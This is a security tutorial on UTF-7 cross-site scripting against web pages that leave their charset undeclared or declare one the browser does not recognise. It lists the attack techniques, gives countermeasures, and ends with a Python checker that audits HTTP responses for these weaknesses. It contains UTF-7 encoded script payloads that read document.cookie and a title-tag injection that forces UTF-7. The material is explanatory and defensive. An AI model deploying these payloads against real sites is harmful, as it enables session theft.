What is UTF-7?
- One of the encoding forms of Unicode (RFC 2152).
- Expresses every Unicode character using ASCII characters only.
- Some ASCII symbols (for example < > = " ;) are also encoded, as base64 runs between + and -.
<div>ABCDE</div>
+ADw-div+AD4-ABCDE+ADw-/div+AD4-
Writing HTML with UTF-7
<html>
<body>
<div>ABCD</div>
</body>
</html>
+ADw-html+AD4-
+ADw-body+AD4-
+ADw-div+AD4-ABCD+ADw-/div+AD4-
+ADw-/body+AD4-
+ADw-/html+AD4-
<input type="text" value="ABCD">
+ADw-input type+ADOAIg-text+ACI- value+ADOAIg-ABCD+ACIAPg-
Target of attack
Applications whose charset is ambiguous are attacked.
The attacker induces the browser to detect the page as UTF-7.
Charset is ambiguous
The charset can be declared in two places:
- HTTP response header
- <meta http-equiv>
When neither declares a charset, the attacker can make the browser decide that the page is UTF-7.
- No charset is specified in HTTP response headers.
HTTP/1.1 200 OK
Content-Type: text/html
....
<html><body>...</body></html>
- No charset is specified in <meta>.
<head>
<meta http-equiv="content-type" content="text/html">
</head>
How to attack
Techniques to get the page recognized as UTF-7
- Auto Selecting Encoding
- via iframe of UTF-7
- unidentifiable charset
Auto Selecting Encoding
When the page contains a string that looks like UTF-7 and no charset is specified, the browser selects UTF-7 automatically.
The page is recognized as UTF-7 and the script runs.
<div>
+ADw-script+AD4-
alert( document.cookie );
+ADw-/script+AD4-
</div>
via iframe of UTF-7
When the page contains Japanese text, auto-detection does not select UTF-7. The attacker forces UTF-7 by loading the target page in an iframe from a page that is itself UTF-7: the framed page declares no charset, so the browser applies the parent page's.
<meta http-equiv='content-type' content='text/html;charset=UTF-7'>
...
<iframe src="target.html"></iframe>
Unidentifiable charset
A charset name the browser does not recognize is treated the same as no charset at all.
Typical wrong charset names (not recognized by the browsers of the time) are:
- Windows-31J / CP932 / MS932 / MS942C / sjis / jis / utf8
<meta http-equiv='content-type' content='text/html;charset=Windows-31J'>
+ADw-script+AD4-alert(document.cookie);+ADw-/script+AD4-
Insert strings before <meta>
If attacker-controlled text appears before the real <meta> (here, inside <title>), it can carry a UTF-7 encoded </title> and a <meta> declaring UTF-7. Decoded as UTF-7, that declaration comes first, and the site's own <meta> with charset=euc-jp arrives too late.
<title>+ADw-/title+AD4-
+ADw-meta http-equiv+AD0-'content-type'
content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
</title><meta http-equiv='content-type' content='text/html;charset=euc-jp'>
Countermeasure
- Specify the charset explicitly (the HTTP header is recommended: the browser sees it before any of the body, and no attacker-controlled text can precede it).
- Use a charset name the browser recognizes (for example Shift_JIS rather than Windows-31J).
- Don't place text the attacker can control before <meta>; put <meta> first inside <head>.
Note: UTF-7 is not in the WHATWG Encoding Standard, so current browsers do not decode it; this attack applies to older browsers, notably Internet Explorer of the time.
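The check below is an added example, not part of the slides, covering the "Charset is ambiguous", "Unidentifiable charset" and countermeasure points together. It parses a raw HTTP response, reports whether the charset comes from the header or only from <meta>, flags charset labels outside an allowlist (KNOWN_CHARSETS is this example's assumption, not any browser's real list), and decodes UTF-7 shift sequences to find those that yield markup, including ones that sit before the real <meta>. The sample responses are constructed to mirror the slides; make_response, audit_response and the problem codes are this example's own names.

```python
import re
from typing import Dict, List, Tuple

# Labels we treat as recognised.  Which labels a given browser honours is
# browser-specific, so this allowlist is an assumption for the example;
# replace it with the labels your target browsers are known to accept.
KNOWN_CHARSETS = frozenset({"utf-8", "shift_jis", "euc-jp", "iso-2022-jp",
                            "iso-8859-1", "windows-1252"})

_CHARSET_PARAM = re.compile(r"charset\s*=\s*[\"']?([A-Za-z0-9._:-]+)", re.I)
# Matches both <meta charset=...> and <meta http-equiv=... content='...;charset=...'>.
_META_CHARSET = re.compile(r"<meta\s[^>]*charset\s*=\s*[\"']?([A-Za-z0-9._:-]+)", re.I)
# A UTF-7 shift sequence: '+', modified-base64 characters, optional '-' terminator.
_SHIFT = re.compile(r"\+[A-Za-z0-9+/]+-?")


def parse_raw_response(raw: str) -> Tuple[Dict[str, str], str]:
    """Split a raw HTTP response into lower-cased header names and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:          # [0] is the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def utf7_markup(text: str) -> List[str]:
    """Decoded text of every UTF-7 shift sequence that yields '<' or '>'."""
    hits = []
    for m in _SHIFT.finditer(text):
        decoded = m.group(0).encode("ascii").decode("utf-7", "replace")
        if "<" in decoded or ">" in decoded:
            hits.append(decoded)
    return hits


def audit_response(raw: str) -> Dict[str, object]:
    """Report how the charset is declared and whether UTF-7 markup is present."""
    headers, body = parse_raw_response(raw)
    m = _CHARSET_PARAM.search(headers.get("content-type", ""))
    header_cs = m.group(1) if m else None
    m = _META_CHARSET.search(body)
    meta_cs, meta_pos = (m.group(1), m.start()) if m else (None, None)
    effective = header_cs or meta_cs

    problems: List[str] = []
    if effective is None:
        problems.append("no-charset")               # the browser will sniff
    elif effective.lower() not in KNOWN_CHARSETS:
        problems.append("unrecognised-charset")     # treated as unspecified
    if header_cs is None and meta_cs is not None:
        problems.append("meta-only")                # text before <meta> can override it
    if utf7_markup(body):
        problems.append("utf7-markup-in-body")
    before_meta: List[str] = []
    if header_cs is None and meta_pos is not None:
        before_meta = utf7_markup(body[:meta_pos])  # attacker text ahead of the real <meta>
    if before_meta:
        problems.append("utf7-markup-before-meta")
    return {"header_charset": header_cs, "meta_charset": meta_cs,
            "effective_charset": effective,
            "utf7_markup_before_meta": before_meta, "problems": problems}


def make_response(content_type: str, body: str) -> str:
    """Build a minimal raw HTTP/1.1 response (constructed sample, not captured traffic)."""
    return "HTTP/1.1 200 OK\r\n" f"Content-Type: {content_type}\r\n" "\r\n" + body


# Constructed samples mirroring the slides.
NO_CHARSET = make_response("text/html", "<html><body>...</body></html>")
HEADER_CHARSET = make_response("text/html; charset=UTF-8", "<html><body>...</body></html>")
UNRECOGNISED = make_response(
    "text/html",
    "<meta http-equiv='content-type' content='text/html;charset=Windows-31J'>\n"
    "+ADw-script+AD4-alert(document.cookie);+ADw-/script+AD4-")
TITLE_INJECTION = make_response(
    "text/html",
    "<title>+ADw-/title+AD4-\n"
    "+ADw-meta http-equiv+AD0-'content-type'\n"
    "content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-\n"
    "</title><meta http-equiv='content-type' content='text/html;charset=euc-jp'>")

if __name__ == "__main__":
    for name, raw in [("no charset", NO_CHARSET), ("header charset", HEADER_CHARSET),
                      ("unrecognised", UNRECOGNISED), ("title injection", TITLE_INJECTION)]:
        print(name, audit_response(raw)["problems"])
```

A response that declares a recognised charset in the Content-Type header yields no problems at all, which is the countermeasure the slides recommend; everything else is reported with the specific weakness so the fix is obvious.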
Recommended reading:
http://openmya.hacker.jp/hasegawa/public/20071107/s6/h6.html?file=datae.txt
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet